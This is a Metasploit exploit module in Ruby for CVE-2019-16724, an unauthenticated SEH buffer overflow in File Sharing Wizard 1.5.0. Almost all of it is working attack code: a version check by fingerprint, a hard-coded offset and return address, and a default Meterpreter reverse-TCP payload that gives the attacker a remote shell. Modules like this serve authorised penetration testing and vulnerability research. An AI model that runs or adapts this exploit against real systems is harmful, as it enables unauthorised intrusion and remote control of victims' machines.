## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Seh def initialize(info = {}) super update_info(info, 'Name' => 'File Sharing Wizard - POST SEH Overflow', 'Description' => %q( This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0. ), 'Author' => [ 'x00pwn', # Original exploit 'Dean Welch ' # Module ], 'License' => MSF_LICENSE, 'References' => [ %w[CVE 2019-16724], %w[EDB 47412] ], 'Payload' => { 'BadChars' => "\x00\x20" }, 'DisclosureDate' => '2019-09-24', 'DefaultOptions' => { 'RPORT' => 80, 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, 'Platform' => 'win', 'Arch' => [ ARCH_X86 ], 'Targets' => [ ['Windows Vista / Windows 7 (x86)', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret | {PAGE_EXECUTE_READ} [MSVCR71.dll] ]) end def check res = send_request_cgi if res.nil? fail_with(Failure::Unreachable, 'Connection timed out.') end # Checks for the `WWW-Authenticate` header in the response if res.code && res.code == 401 && res.headers['WWW-Authenticate'].include?('Basic realm="File Sharing Wizard"') CheckCode::Detected else CheckCode::Safe end end def exploit buf = rand_text_english(target['Offset']) buf << generate_seh_payload(target.ret) print_status('Sending payload to target') send_request_raw({ 'method' => 'POST', 'uri' => buf }, 0) end end